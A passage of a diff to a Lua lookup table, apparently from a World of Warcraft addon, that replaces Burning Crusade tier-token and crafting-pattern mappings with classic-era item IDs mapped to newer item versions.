Bloodmail Belt + ["14614"] = { + 228014, -- Bloodmail Belt }, - -- Cyclone Faceguard - ["29035"] = { - 29760, -- Helm of the Fallen Champion + -- Bloodmail Gauntlets + ["14615"] = { + 228020, -- Bloodmail Gauntlets }, - -- Cyclone Legguards - ["29036"] = { - 29766, -- Leggings of the Fallen Champion + -- Bloodmail Boots + ["14616"] = { + 227998, -- Bloodmail Boots }, - -- Cyclone Shoulderguards - ["29037"] = { - 29763, -- Pauldrons of the Fallen Champion + -- Deathbone Girdle + ["14620"] = { + 228002, -- Deathbone Girdle }, - -- Cyclone Breastplate - ["29038"] = { - 29754, -- Chestguard of the Fallen Champion + -- Deathbone Sabatons + ["14621"] = { + 227999, -- Deathbone Sabatons }, - -- Cyclone Gauntlets - ["29039"] = { - 29757, -- Gloves of the Fallen Champion + -- Deathbone Gauntlets + ["14622"] = { + 228006, -- Deathbone Gauntlets }, - -- Cyclone Helm - ["29040"] = { - 29760, -- Helm of the Fallen Champion + -- Deathbone Legguards + ["14623"] = { + 228008, -- Deathbone Legguards }, - -- Cyclone War-Kilt - ["29042"] = { - 29766, -- Leggings of the Fallen Champion + -- Deathbone Chestplate + ["14624"] = { + 228000, -- Deathbone Chestplate }, - -- Cyclone Shoulderplates - ["29043"] = { - 29763, -- Pauldrons of the Fallen Champion + -- Necropile Robe + ["14626"] = { + 228013, -- Necropile Robe }, - -- Netherblade Facemask - ["29044"] = { - 29760, -- Helm of the Fallen Champion + -- Necropile Cuffs + ["14629"] = { + 228011, -- Necropile Cuffs }, - -- Netherblade Chestpiece - ["29045"] = { - 29754, -- Chestguard of the Fallen Champion + -- Pattern: Enchanter's Cowl + ["14630"] = { + 217258, -- Pattern: Enchanter's Cowl }, - -- Netherblade Breeches - ["29046"] = { - 29766, -- Leggings of the Fallen Champion + -- Necropile Boots + ["14631"] = { + 228009, -- Necropile Boots }, - -- Netherblade Shoulderpads - ["29047"] = { - 29763, -- Pauldrons of the Fallen Champion + -- Necropile Leggings + ["14632"] = { + 228018, -- Necropile Leggings }, - -- Netherblade Gloves - ["29048"] = { - 29757, -- Gloves of the Fallen Champion + -- Necropile Mantle + ["14633"] = { + 228010, -- Necropile Mantle }, - -- Light-Collar of the Incarnate - ["29049"] = { - 29761, -- Helm of the Fallen Defender + -- Cadaverous Armor + ["14637"] = { + 227995, -- Cadaverous Armor }, - -- Robes of the Incarnate - ["29050"] = { - 29753, -- Chestguard of the Fallen Defender + -- Mortar and Pestle + ["15454"] = { + 206176, -- Mortar and Pestle }, - -- Trousers of the Incarnate - ["29053"] = { - 29767, -- Leggings of the Fallen Defender + -- Knight-Lieutenant's Silk Gloves + ["16391"] = { + 227116, -- Knight-Lieutenant's Silk Gloves }, - -- Light-Mantle of the Incarnate - ["29054"] = { - 29764, -- Pauldrons of the Fallen Defender + -- Knight-Lieutenant's Dragonhide Gloves + ["16397"] = { + 227193, -- Knight-Lieutenant's Dragonhide Gloves }, - -- Handwraps of the Incarnate - ["29055"] = { - 29758, -- Gloves of the Fallen Defender + -- Knight-Lieutenant's Plate Gauntlets + ["16406"] = { + 227053, -- Knight-Lieutenant's Plate Gauntlets }, - -- Shroud of the Incarnate - ["29056"] = { - 29753, -- Chestguard of the Fallen Defender + -- Knight-Lieutenant's Lamellar Sabatons + ["16409"] = { + 227146, -- Knight-Lieutenant's Lamellar Sabatons }, - -- Gloves of the Incarnate - ["29057"] = { - 29758, -- Gloves of the Fallen Defender + -- Knight-Lieutenant's Lamellar Gauntlets + ["16410"] = { + 227147, -- Knight-Lieutenant's Lamellar Gauntlets }, - -- Soul-Collar of the Incarnate - ["29058"] = { - 29761, -- Helm of the Fallen Defender + -- Knight-Captain's Leather Legguards + ["16419"] = { + 227061, -- Knight-Captain's Leather Legguards }, - -- Leggings of the Incarnate - ["29059"] = { - 29767, -- Leggings of the Fallen Defender + -- Knight-Captain's Dragonhide Tunic + ["16421"] = { + 227196, -- Knight-Captain's Dragonhide Tunic }, - -- Soul-Mantle of the Incarnate - ["29060"] = { - 29764, -- Pauldrons of the Fallen Defender + -- Knight-Captain's Dragonhide Leggings + ["16422"] = { + 227178, -- Knight-Captain's Dragonhide Leggings }, - -- Justicar Diadem - ["29061"] = { - 29760, -- Helm of the Fallen Champion + -- Knight-Captain's Chain Hauberk + ["16425"] = { + 227070, -- Knight-Captain's Chain Hauberk }, - -- Justicar Chestpiece - ["29062"] = { - 29754, -- Chestguard of the Fallen Champion + -- Lieutenant Commander's Chain Pauldrons + ["16427"] = { + 227084, -- Lieutenant Commander's Chain Pauldrons }, - -- Justicar Leggings - ["29063"] = { - 29766, -- Leggings of the Fallen Champion + -- Lieutenant Commander's Plate Helm + ["16429"] = { + 227044, -- Lieutenant Commander's Plate Helm }, - -- Justicar Pauldrons - ["29064"] = { - 29763, -- Pauldrons of the Fallen Champion + -- Knight-Captain's Plate Leggings + ["16431"] = { + 227047, -- Knight-Captain's Plate Leggings }, - -- Justicar Gloves - ["29065"] = { - 29757, -- Gloves of the Fallen Champion + -- Knight-Captain's Lamellar Breastplate + ["16433"] = { + 227142, -- Knight-Captain's Lamellar Breastplate }, - -- Justicar Chestguard - ["29066"] = { - 29754, -- Chestguard of the Fallen Champion + -- Lieutenant Commander's Lamellar Headguard + ["16434"] = { + 227144, -- Lieutenant Commander's Lamellar Headguard }, - -- Justicar Handguards - ["29067"] = { - 29757, -- Gloves of the Fallen Champion + -- Knight-Captain's Lamellar Leggings + ["16435"] = { + 227143, -- Knight-Captain's Lamellar Leggings }, - -- Justicar Faceguard - ["29068"] = { - 29760, -- Helm of the Fallen Champion + -- Lieutenant Commander's Lamellar Shoulders + ["16436"] = { + 227145, -- Lieutenant Commander's Lamellar Shoulders }, - -- Justicar Legguards - ["29069"] = { - 29766, -- Leggings of the Fallen Champion + -- First Sergeant's Silk Cuffs + ["16486"] = { + 216707, -- First Sergeant's Silk Cuffs }, - -- Justicar Shoulderguards - ["29070"] = { - 29763, -- Pauldrons of the Fallen Champion + -- Blood Guard's Silk Gloves + ["16487"] = { + 227117, -- Blood Guard's Silk Gloves }, - -- Justicar Breastplate - ["29071"] = { - 29754, -- Chestguard of the Fallen Champion + -- Blood Guard's Dragonhide Boots + ["16494"] = { + 227188, -- Blood Guard's Dragonhide Boots }, - -- Justicar Gauntlets - ["29072"] = { - 29757, -- Gloves of the Fallen Champion + -- Blood Guard's Dragonhide Gauntlets + ["16496"] = { + 227204, -- Blood Guard's Dragonhide Gauntlets }, - -- Justicar Crown - ["29073"] = { - 29760, -- Helm of the Fallen Champion + -- First Sergeant's Leather Armguards + ["16497"] = { + 216706, -- First Sergeant's Leather Armguards }, - -- Justicar Greaves - ["29074"] = { - 29766, -- Leggings of the Fallen Champion + -- Champion's Dragonhide Spaulders + ["16501"] = { + 227184, -- Champion's Dragonhide Spaulders }, - -- Justicar Shoulderplates - ["29075"] = { - 29763, -- Pauldrons of the Fallen Champion + -- Champion's Dragonhide Helm + ["16503"] = { + 227186, -- Champion's Dragonhide Helm }, - -- Collar of the Aldor - ["29076"] = { - 29759, -- Helm of the Fallen Hero + -- Champion's Mail Helm + ["16521"] = { + 227162, -- Champion's Mail Helm }, - -- Vestments of the Aldor - ["29077"] = { - 29755, -- Chestguard of the Fallen Hero + -- Legionnaire's Mail Leggings + ["16523"] = { + 227161, -- Legionnaire's Mail Leggings }, - -- Legwraps of the Aldor - ["29078"] = { - 29765, -- Leggings of the Fallen Hero + -- Champion's Chain Pauldrons + ["16528"] = { + 227078, -- Champion's Chain Pauldrons }, - -- Pauldrons of the Aldor - ["29079"] = { - 29762, -- Pauldrons of the Fallen Hero + -- First Sergeant's Mail Wristguards + ["16532"] = { + 216703, -- First Sergeant's Mail Wristguards }, - -- Gloves of the Aldor - ["29080"] = { - 29756, -- Gloves of the Fallen Hero + -- Vest of Elements + ["16666"] = { + 226749, -- Vest of Elements }, - -- Demon Stalker Greathelm - ["29081"] = { - 29759, -- Helm of the Fallen Hero + -- Coif of Elements + ["16667"] = { + 226755, -- Coif of Elements }, - -- Demon Stalker Harness - ["29082"] = { - 29755, -- Chestguard of the Fallen Hero + -- Kilt of Elements + ["16668"] = { + 226750, -- Kilt of Elements }, - -- Demon Stalker Greaves - ["29083"] = { - 29765, -- Leggings of the Fallen Hero + -- Pauldrons of Elements + ["16669"] = { + 226753, -- Pauldrons of Elements }, - -- Demon Stalker Shoulderguards - ["29084"] = { - 29762, -- Pauldrons of the Fallen Hero + -- Boots of Elements + ["16670"] = { + 226752, -- Boots of Elements }, - -- Demon Stalker Gauntlets - ["29085"] = { - 29756, -- Gloves of the Fallen Hero + -- Bindings of Elements + ["16671"] = { + 226751, -- Bindings of Elements }, - -- Crown of Malorne - ["29086"] = { - 29761, -- Helm of the Fallen Defender + -- Gauntlets of Elements + ["16672"] = { + 226748, -- Gauntlets of Elements }, - -- Chestguard of Malorne - ["29087"] = { - 29753, -- Chestguard of the Fallen Defender + -- Cord of Elements + ["16673"] = { + 226754, -- Cord of Elements }, - -- Legguards of Malorne - ["29088"] = { - 29767, -- Leggings of the Fallen Defender + -- Beaststalker's Tunic + ["16674"] = { + 226723, -- Beaststalker's Tunic }, - -- Shoulderguards of Malorne - ["29089"] = { - 29764, -- Pauldrons of the Fallen Defender + -- Beaststalker's Boots + ["16675"] = { + 226722, -- Beaststalker's Boots }, - -- Handguards of Malorne - ["29090"] = { - 29758, -- Gloves of the Fallen Defender + -- Beaststalker's Gloves + ["16676"] = { + 226721, -- Beaststalker's Gloves }, - -- Chestpiece of Malorne - ["29091"] = { - 29753, -- Chestguard of the Fallen Defender + -- Beaststalker's Cap + ["16677"] = { + 226720, -- Beaststalker's Cap }, - -- Gloves of Malorne - ["29092"] = { - 29758, -- Gloves of the Fallen Defender + -- Beaststalker's Pants + ["16678"] = { + 226719, -- Beaststalker's Pants }, - -- Antlers of Malorne - ["29093"] = { - 29761, -- Helm of the Fallen Defender + -- Beaststalker's Mantle + ["16679"] = { + 226716, -- Beaststalker's Mantle }, - -- Britches of Malorne - ["29094"] = { - 29767, -- Leggings of the Fallen Defender + -- Beaststalker's Belt + ["16680"] = { + 226718, -- Beaststalker's Belt }, - -- Pauldrons of Malorne - ["29095"] = { - 29764, -- Pauldrons of the Fallen Defender + -- Beaststalker's Bindings + ["16681"] = { + 226717, -- Beaststalker's Bindings }, - -- Breastplate of Malorne - ["29096"] = { - 29753, -- Chestguard of the Fallen Defender + -- Magister's Boots + ["16682"] = { + 226730, -- Magister's Boots }, - -- Gauntlets of Malorne - ["29097"] = { - 29758, -- Gloves of the Fallen Defender + -- Magister's Bindings + ["16683"] = { + 226725, -- Magister's Bindings }, - -- Stag-Helm of Malorne - ["29098"] = { - 29761, -- Helm of the Fallen Defender + -- Magister's Gloves + ["16684"] = { + 226731, -- Magister's Gloves }, - -- Greaves of Malorne - ["29099"] = { - 29767, -- Leggings of the Fallen Defender + -- Magister's Belt + ["16685"] = { + 226724, -- Magister's Belt }, - -- Mantle of Malorne - ["29100"] = { - 29764, -- Pauldrons of the Fallen Defender + -- Magister's Crown + ["16686"] = { + 226728, -- Magister's Crown }, - -- Chestguard of the Fallen Defender - ["29753"] = { - 29012, -- Warbringer Chestguard - 29019, -- Warbringer Breastplate - 29050, -- Robes of the Incarnate - 29056, -- Shroud of the Incarnate - 29087, -- Chestguard of Malorne - 29091, -- Chestpiece of Malorne - 29096, -- Breastplate of Malorne + -- Magister's Leggings + ["16687"] = { + 226727, -- Magister's Leggings }, - -- Chestguard of the Fallen Champion - ["29754"] = { - 29029, -- Cyclone Hauberk - 29033, -- Cyclone Chestguard - 29038, -- Cyclone Breastplate - 29045, -- Netherblade Chestpiece - 29062, -- Justicar Chestpiece - 29066, -- Justicar Chestguard - 29071, -- Justicar Breastplate + -- Magister's Robes + ["16688"] = { + 226729, -- Magister's Robes }, - -- Chestguard of the Fallen Hero - ["29755"] = { - 28964, -- Voidheart Robe - 29077, -- Vestments of the Aldor - 29082, -- Demon Stalker Harness + -- Magister's Mantle + ["16689"] = { + 226726, -- Magister's Mantle }, - -- Gloves of the Fallen Hero - ["29756"] = { - 28968, -- Voidheart Gloves - 29080, -- Gloves of the Aldor - 29085, -- Demon Stalker Gauntlets + -- Devout Robe + ["16690"] = { + 226745, -- Devout Robe }, - -- Gloves of the Fallen Champion - ["29757"] = { - 29032, -- Cyclone Gloves - 29034, -- Cyclone Handguards - 29039, -- Cyclone Gauntlets - 29048, -- Netherblade Gloves - 29065, -- Justicar Gloves - 29067, -- Justicar Handguards - 29072, -- Justicar Gauntlets + -- Devout Sandals + ["16691"] = { + 226743, -- Devout Sandals }, - -- Gloves of the Fallen Defender - ["29758"] = { - 29017, -- Warbringer Handguards - 29020, -- Warbringer Gauntlets - 29055, -- Handwraps of the Incarnate - 29057, -- Gloves of the Incarnate - 29090, -- Handguards of Malorne - 29092, -- Gloves of Malorne - 29097, -- Gauntlets of Malorne + -- Devout Gloves + ["16692"] = { + 226740, -- Devout Gloves }, - -- Helm of the Fallen Hero - ["29759"] = { - 28963, -- Voidheart Crown - 29076, -- Collar of the Aldor - 29081, -- Demon Stalker Greathelm + -- Devout Crown + ["16693"] = { + 226746, -- Devout Crown }, - -- Helm of the Fallen Champion - ["29760"] = { - 29028, -- Cyclone Headdress - 29035, -- Cyclone Faceguard - 29040, -- Cyclone Helm - 29044, -- Netherblade Facemask - 29061, -- Justicar Diadem - 29068, -- Justicar Faceguard - 29073, -- Justicar Crown + -- Devout Skirt + ["16694"] = { + 226747, -- Devout Skirt }, - -- Helm of the Fallen Defender - ["29761"] = { - 29011, -- Warbringer Greathelm - 29021, -- Warbringer Battle-Helm - 29049, -- Light-Collar of the Incarnate - 29058, -- Soul-Collar of the Incarnate - 29086, -- Crown of Malorne - 29093, -- Antlers of Malorne - 29098, -- Stag-Helm of Malorne + -- Devout Mantle + ["16695"] = { + 226741, -- Devout Mantle }, - -- Pauldrons of the Fallen Hero - ["29762"] = { - 28967, -- Voidheart Mantle - 29079, -- Pauldrons of the Aldor - 29084, -- Demon Stalker Shoulderguards + -- Devout Belt + ["16696"] = { + 226744, -- Devout Belt }, - -- Pauldrons of the Fallen Champion - ["29763"] = { - 29031, -- Cyclone Shoulderpads - 29037, -- Cyclone Shoulderguards - 29043, -- Cyclone Shoulderplates - 29047, -- Netherblade Shoulderpads - 29064, -- Justicar Pauldrons - 29070, -- Justicar Shoulderguards - 29075, -- Justicar Shoulderplates + -- Devout Bracers + ["16697"] = { + 226742, -- Devout Bracers }, - -- Pauldrons of the Fallen Defender - ["29764"] = { - 29016, -- Warbringer Shoulderguards - 29023, -- Warbringer Shoulderplates - 29054, -- Light-Mantle of the Incarnate - 29060, -- Soul-Mantle of the Incarnate - 29089, -- Shoulderguards of Malorne - 29095, -- Pauldrons of Malorne - 29100, -- Mantle of Malorne + -- Dreadmist Mask + ["16698"] = { + 226762, -- Dreadmist Mask }, - -- Leggings of the Fallen Hero - ["29765"] = { - 28966, -- Voidheart Leggings - 29078, -- Legwraps of the Aldor - 29083, -- Demon Stalker Greaves + -- Dreadmist Leggings + ["16699"] = { + 226760, -- Dreadmist Leggings }, - -- Leggings of the Fallen Champion - ["29766"] = { - 29030, -- Cyclone Kilt - 29036, -- Cyclone Legguards - 29042, -- Cyclone War-Kilt - 29046, -- Netherblade Breeches - 29063, -- Justicar Leggings - 29069, -- Justicar Legguards - 29074, -- Justicar Greaves + -- Dreadmist Robe + ["16700"] = { + 226757, -- Dreadmist Robe }, - -- Leggings of the Fallen Defender - ["29767"] = { - 29015, -- Warbringer Legguards - 29022, -- Warbringer Greaves - 29053, -- Trousers of the Incarnate - 29059, -- Leggings of the Incarnate - 29088, -- Legguards of Malorne - 29094, -- Britches of Malorne - 29099, -- Greaves of Malorne + -- Dreadmist Mantle + ["16701"] = { + 226756, -- Dreadmist Mantle }, - -- The Darkener's Grasp - ["30007"] = { - 32405, -- Verdant Sphere + -- Dreadmist Belt + ["16702"] = { + 226761, -- Dreadmist Belt }, - -- The Sun King's Talisman - ["30015"] = { - 32405, -- Verdant Sphere + -- Dreadmist Bracers + ["16703"] = { + 226759, -- Dreadmist Bracers }, - -- Telonicus's Pendant of Mayhem - ["30017"] = { - 32405, -- Verdant Sphere + -- Dreadmist Sandals + ["16704"] = { + 226763, -- Dreadmist Sandals }, - -- Lord Sanguinar's Claim - ["30018"] = { - 32405, -- Verdant Sphere + -- Dreadmist Wraps + ["16705"] = { + 226758, -- Dreadmist Wraps }, - -- Red Havoc Boots - ["30031"] = { - 30324, -- Plans: Red Havoc Boots + -- Wildheart Vest + ["16706"] = { + 226715, -- Wildheart Vest }, - -- Red Belt of Battle - ["30032"] = { - 30322, -- Plans: Red Belt of Battle + -- Shadowcraft Cap + ["16707"] = { + 226707, -- Shadowcraft Cap }, - -- Boots of the Protector - ["30033"] = { - 30323, -- Plans: Boots of the Protector + -- Shadowcraft Spaulders + ["16708"] = { + 226706, -- Shadowcraft Spaulders }, - -- Belt of the Guardian - ["30034"] = { - 30321, -- Plans: Belt of the Guardian + -- Shadowcraft Pants + ["16709"] = { + 226705, -- Shadowcraft Pants }, - -- Boots of the Long Road - ["30035"] = { - 30283, -- Pattern: Boots of the Long Road + -- Shadowcraft Bracers + ["16710"] = { + 226704, -- Shadowcraft Bracers }, - -- Belt of the Long Road - ["30036"] = { - 30281, -- Pattern: Belt of the Long Road + -- Shadowcraft Boots + ["16711"] = { + 226703, -- Shadowcraft Boots }, - -- Boots of Blasting - ["30037"] = { - 30282, -- Pattern: Boots of Blasting + -- Shadowcraft Gloves + ["16712"] = { + 226702, -- Shadowcraft Gloves }, - -- Belt of Blasting - ["30038"] = { - 30280, -- Pattern: Belt of Blasting + -- Shadowcraft Belt + ["16713"] = { + 226701, -- Shadowcraft Belt }, - -- Boots of Utter Darkness - ["30039"] = { - 30306, -- Pattern: Boots of Utter Darkness + -- Wildheart Bracers + ["16714"] = { + 226714, -- Wildheart Bracers }, - -- Belt of Deep Shadow - ["30040"] = { - 30302, -- Pattern: Belt of Deep Shadow + -- Wildheart Boots + ["16715"] = { + 226713, -- Wildheart Boots }, - -- Boots of Natural Grace - ["30041"] = { - 30305, -- Pattern: Boots of Natural Grace + -- Wildheart Belt + ["16716"] = { + 226712, -- Wildheart Belt }, - -- Belt of Natural Power - ["30042"] = { - 30301, -- Pattern: Belt of Natural Power + -- Wildheart Gloves + ["16717"] = { + 226711, -- Wildheart Gloves }, - -- Hurricane Boots - ["30043"] = { - 30308, -- Pattern: Hurricane Boots + -- Wildheart Spaulders + ["16718"] = { + 226710, -- Wildheart Spaulders }, - -- Monsoon Belt - ["30044"] = { - 30304, -- Pattern: Monsoon Belt + -- Wildheart Kilt + ["16719"] = { + 226709, -- Wildheart Kilt }, - -- Boots of the Crimson Hawk - ["30045"] = { - 30307, -- Pattern: Boots of the Crimson Hawk + -- Wildheart Cowl + ["16720"] = { + 226708, -- Wildheart Cowl }, - -- Belt of the Black Eagle - ["30046"] = { - 30303, -- Pattern: Belt of the Black Eagle + -- Shadowcraft Tunic + ["16721"] = { + 226700, -- Shadowcraft Tunic }, - -- Destroyer Chestguard - ["30113"] = { - 30237, -- Chestguard of the Vanquished Defender + -- Lightforge Bracers + ["16722"] = { + 226739, -- Lightforge Bracers }, - -- Destroyer Handguards - ["30114"] = { - 30240, -- Gloves of the Vanquished Defender + -- Lightforge Belt + ["16723"] = { + 226732, -- Lightforge Belt }, - -- Destroyer Greathelm - ["30115"] = { - 30243, -- Helm of the Vanquished Defender + -- Lightforge Gauntlets + ["16724"] = { + 226737, -- Lightforge Gauntlets }, - -- Destroyer Legguards - ["30116"] = { - 30246, -- Leggings of the Vanquished Defender + -- Lightforge Boots + ["16725"] = { + 226738, -- Lightforge Boots }, - -- Destroyer Shoulderguards - ["30117"] = { - 30249, -- Pauldrons of the Vanquished Defender + -- Lightforge Breastplate + ["16726"] = { + 226734, -- Lightforge Breastplate }, - -- Destroyer Breastplate - ["30118"] = { - 30237, -- Chestguard of the Vanquished Defender + -- Lightforge Helm + ["16727"] = { + 226733, -- Lightforge Helm }, - -- Destroyer Gauntlets - ["30119"] = { - 30240, -- Gloves of the Vanquished Defender + -- Lightforge Legplates + ["16728"] = { + 226736, -- Lightforge Legplates }, - -- Destroyer Battle-Helm - ["30120"] = { - 30243, -- Helm of the Vanquished Defender + -- Lightforge Spaulders + ["16729"] = { + 226735, -- Lightforge Spaulders }, - -- Destroyer Greaves - ["30121"] = { - 30246, -- Leggings of the Vanquished Defender + -- Breastplate of Valor + ["16730"] = { + 226770, -- Breastplate of Valor }, - -- Destroyer Shoulderblades - ["30122"] = { - 30249, -- Pauldrons of the Vanquished Defender + -- Helm of Valor + ["16731"] = { + 226769, -- Helm of Valor }, - -- Crystalforge Chestguard - ["30123"] = { - 30236, -- Chestguard of the Vanquished Champion + -- Legplates of Valor + ["16732"] = { + 226767, -- Legplates of Valor }, - -- Crystalforge Handguards - ["30124"] = { - 30239, -- Gloves of the Vanquished Champion + -- Spaulders of Valor + ["16733"] = { + 226768, -- Spaulders of Valor }, - -- Crystalforge Faceguard - ["30125"] = { - 30242, -- Helm of the Vanquished Champion + -- Boots of Valor + ["16734"] = { + 226764, -- Boots of Valor }, - -- Crystalforge Legguards - ["30126"] = { - 30245, -- Leggings of the Vanquished Champion + -- Bracers of Valor + ["16735"] = { + 226766, -- Bracers of Valor }, - -- Crystalforge Shoulderguards - ["30127"] = { - 30248, -- Pauldrons of the Vanquished Champion + -- Belt of Valor + ["16736"] = { + 226765, -- Belt of Valor }, - -- Crystalforge Breastplate - ["30129"] = { - 30236, -- Chestguard of the Vanquished Champion + -- Gauntlets of Valor + ["16737"] = { + 226771, -- Gauntlets of Valor }, - -- Crystalforge Gauntlets - ["30130"] = { - 30239, -- Gloves of the Vanquished Champion + -- Fathom Core + ["16762"] = { + 204270, -- Fathom Core }, - -- Crystalforge War-Helm - ["30131"] = { - 30242, -- Helm of the Vanquished Champion + -- Furbolg Medicine Pouch + ["16768"] = { + 227812, -- Furbolg Medicine Pouch }, - -- Crystalforge Greaves - ["30132"] = { - 30245, -- Leggings of the Vanquished Champion + -- Strange Water Globe + ["16782"] = { + 211454, -- Strange Water Globe }, - -- Crystalforge Shoulderbraces - ["30133"] = { - 30248, -- Pauldrons of the Vanquished Champion + -- Arcanist Crown + ["16795"] = { + 226562, -- Arcanist Crown }, - -- Crystalforge Chestpiece - ["30134"] = { - 30236, -- Chestguard of the Vanquished Champion + -- Arcanist Leggings + ["16796"] = { + 226561, -- Arcanist Leggings }, - -- Crystalforge Gloves - ["30135"] = { - 30239, -- Gloves of the Vanquished Champion + -- Arcanist Mantle + ["16797"] = { + 226560, -- Arcanist Mantle }, - -- Crystalforge Greathelm - ["30136"] = { - 30242, -- Helm of the Vanquished Champion + -- Arcanist Robes + ["16798"] = { + 226559, -- Arcanist Robes }, - -- Crystalforge Leggings - ["30137"] = { - 30245, -- Leggings of the Vanquished Champion + -- Arcanist Bindings + ["16799"] = { + 226558, -- Arcanist Bindings }, - -- Crystalforge Pauldrons - ["30138"] = { - 30248, -- Pauldrons of the Vanquished Champion + -- Arcanist Boots + ["16800"] = { + 226557, -- Arcanist Boots }, - -- Rift Stalker Hauberk - ["30139"] = { - 30238, -- Chestguard of the Vanquished Hero + -- Arcanist Gloves + ["16801"] = { + 226556, -- Arcanist Gloves }, - -- Rift Stalker Gauntlets - ["30140"] = { - 30241, -- Gloves of the Vanquished Hero + -- Arcanist Belt + ["16802"] = { + 226555, -- Arcanist Belt }, - -- Rift Stalker Helm - ["30141"] = { - 30244, -- Helm of the Vanquished Hero + -- Felheart Slippers + ["16803"] = { + 226554, -- Felheart Slippers }, - -- Rift Stalker Leggings - ["30142"] = { - 30247, -- Leggings of the Vanquished Hero + -- Felheart Bracers + ["16804"] = { + 226553, -- Felheart Bracers }, - -- Rift Stalker Mantle - ["30143"] = { - 30250, -- Pauldrons of the Vanquished Hero + -- Felheart Gloves + ["16805"] = { + 226552, -- Felheart Gloves }, - -- Deathmantle Chestguard - ["30144"] = { - 30236, -- Chestguard of the Vanquished Champion + -- Felheart Belt + ["16806"] = { + 226551, -- Felheart Belt }, - -- Deathmantle Handguards - ["30145"] = { - 30239, -- Gloves of the Vanquished Champion + -- Felheart Shoulder Pads + ["16807"] = { + 226550, -- Felheart Shoulder Pads }, - -- Deathmantle Helm - ["30146"] = { - 30242, -- Helm of the Vanquished Champion + -- Felheart Horns + ["16808"] = { + 226549, -- Felheart Horns }, - -- Deathmantle Legguards - ["30148"] = { - 30245, -- Leggings of the Vanquished Champion + -- Felheart Robes + ["16809"] = { + 226548, -- Felheart Robes }, - -- Deathmantle Shoulderpads - ["30149"] = { - 30248, -- Pauldrons of the Vanquished Champion + -- Felheart Pants + ["16810"] = { + 226547, -- Felheart Pants }, - -- Vestments of the Avatar - ["30150"] = { - 30237, -- Chestguard of the Vanquished Defender + -- Boots of Prophecy + ["16811"] = { + 226571, -- Boots of Prophecy }, - -- Gloves of the Avatar - ["30151"] = { - 30240, -- Gloves of the Vanquished Defender + -- Gloves of Prophecy + ["16812"] = { + 226572, -- Gloves of Prophecy }, - -- Cowl of the Avatar - ["30152"] = { - 30243, -- Helm of the Vanquished Defender + -- Circlet of Prophecy + ["16813"] = { + 226573, -- Circlet of Prophecy }, - -- Breeches of the Avatar - ["30153"] = { - 30246, -- Leggings of the Vanquished Defender + -- Pants of Prophecy + ["16814"] = { + 226574, -- Pants of Prophecy }, - -- Mantle of the Avatar - ["30154"] = { - 30249, -- Pauldrons of the Vanquished Defender + -- Robes of Prophecy + ["16815"] = { + 226575, -- Robes of Prophecy }, - -- Shroud of the Avatar - ["30159"] = { - 30237, -- Chestguard of the Vanquished Defender + -- Mantle of Prophecy + ["16816"] = { + 226576, -- Mantle of Prophecy }, - -- Handguards of the Avatar - ["30160"] = { - 30240, -- Gloves of the Vanquished Defender + -- Girdle of Prophecy + ["16817"] = { + 226577, -- Girdle of Prophecy }, - -- Hood of the Avatar - ["30161"] = { - 30243, -- Helm of the Vanquished Defender + -- Vambraces of Prophecy + ["16819"] = { + 226578, -- Vambraces of Prophecy }, - -- Leggings of the Avatar - ["30162"] = { - 30246, -- Leggings of the Vanquished Defender + -- Nightslayer Chestpiece + ["16820"] = { + 226447, -- Nightslayer Chestpiece }, - -- Wings of the Avatar - ["30163"] = { - 30249, -- Pauldrons of the Vanquished Defender + -- Nightslayer Cover + ["16821"] = { + 226446, -- Nightslayer Cover }, - -- Cataclysm Chestguard - ["30164"] = { - 30236, -- Chestguard of the Vanquished Champion + -- Nightslayer Pants + ["16822"] = { + 226445, -- Nightslayer Pants }, - -- Cataclysm Gloves - ["30165"] = { - 30239, -- Gloves of the Vanquished Champion + -- Nightslayer Shoulder Pads + ["16823"] = { + 226444, -- Nightslayer Shoulder Pads }, - -- Cataclysm Headguard - ["30166"] = { - 30242, -- Helm of the Vanquished Champion + -- Nightslayer Boots + ["16824"] = { + 226443, -- Nightslayer Boots }, - -- Cataclysm Legguards - ["30167"] = { - 30245, -- Leggings of the Vanquished Champion + -- Nightslayer Bracelets + ["16825"] = { + 226442, -- Nightslayer Bracelets }, - -- Cataclysm Shoulderguards - ["30168"] = { - 30248, -- Pauldrons of the Vanquished Champion + -- Nightslayer Gloves + ["16826"] = { + 226441, -- Nightslayer Gloves }, - -- Cataclysm Chestpiece - ["30169"] = { - 30236, -- Chestguard of the Vanquished Champion + -- Nightslayer Belt + ["16827"] = { + 226440, -- Nightslayer Belt }, - -- Cataclysm Handgrips - ["30170"] = { - 30239, -- Gloves of the Vanquished Champion + -- Cenarion Belt + ["16828"] = { + 226650, -- Cenarion Belt }, - -- Cataclysm Headpiece - ["30171"] = { - 30242, -- Helm of the Vanquished Champion + -- Cenarion Boots + ["16829"] = { + 226645, -- Cenarion Boots }, - -- Cataclysm Leggings - ["30172"] = { - 30245, -- Leggings of the Vanquished Champion + -- Cenarion Bracers + ["16830"] = { + 226649, -- Cenarion Bracers }, - -- Cataclysm Shoulderpads - ["30173"] = { - 30248, -- Pauldrons of the Vanquished Champion + -- Cenarion Gloves + ["16831"] = { + 226648, -- Cenarion Gloves }, - -- Cataclysm Chestplate - ["30185"] = { - 30236, -- Chestguard of the Vanquished Champion + -- Cenarion Helm + ["16834"] = { + 226647, -- Cenarion Helm }, - -- Cataclysm Gauntlets - ["30189"] = { - 30239, -- Gloves of the Vanquished Champion + -- Cenarion Leggings + ["16835"] = { + 226646, -- Cenarion Leggings }, - -- Cataclysm Helm - ["30190"] = { - 30242, -- Helm of the Vanquished Champion + -- Cenarion Spaulders + ["16836"] = { + 226644, -- Cenarion Spaulders }, - -- Cataclysm Legplates - ["30192"] = { - 30245, -- Leggings of the Vanquished Champion + -- Earthfury Boots + ["16837"] = { + 226613, -- Earthfury Boots }, - -- Cataclysm Shoulderplates - ["30194"] = { - 30248, -- Pauldrons of the Vanquished Champion + -- Earthfury Belt + ["16838"] = { + 226616, -- Earthfury Belt }, - -- Robes of Tirisfal - ["30196"] = { - 30238, -- Chestguard of the Vanquished Hero + -- Earthfury Gauntlets + ["16839"] = { + 226615, -- Earthfury Gauntlets }, - -- Gloves of Tirisfal - ["30205"] = { - 30241, -- Gloves of the Vanquished Hero + -- Earthfury Bracers + ["16840"] = { + 226618, -- Earthfury Bracers }, - -- Cowl of Tirisfal - ["30206"] = { - 30244, -- Helm of the Vanquished Hero + -- Earthfury Vestments + ["16841"] = { + 226617, -- Earthfury Vestments }, - -- Leggings of Tirisfal - ["30207"] = { - 30247, -- Leggings of the Vanquished Hero + -- Earthfury Helmet + ["16842"] = { + 226612, -- Earthfury Helmet }, - -- Mantle of Tirisfal - ["30210"] = { - 30250, -- Pauldrons of the Vanquished Hero + -- 